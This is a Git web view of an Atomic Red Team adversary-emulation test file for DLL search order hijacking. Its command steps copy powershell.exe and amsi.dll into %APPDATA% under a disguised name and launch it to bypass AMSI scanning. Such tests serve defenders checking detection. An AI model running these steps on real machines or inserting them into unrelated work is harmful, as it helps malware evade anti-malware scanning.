security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1038/T1038.yaml
T
JimmyAstle e1f2936764 Update T1038 (#581) 
Swaping on a /c for a /k so the test isnt blocking since this is spawning a new powershell session.
2019-10-08 12:01:35 -06:00

22 lines
711 B
YAML
Raw Blame History

---
attack_technique: T1038
display_name: DLL Search Order Hijacking
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
description: |
Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version
of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
cmd.exe /k %APPDATA%\updater.exe
Reference in New Issue View Git Blame Copy Permalink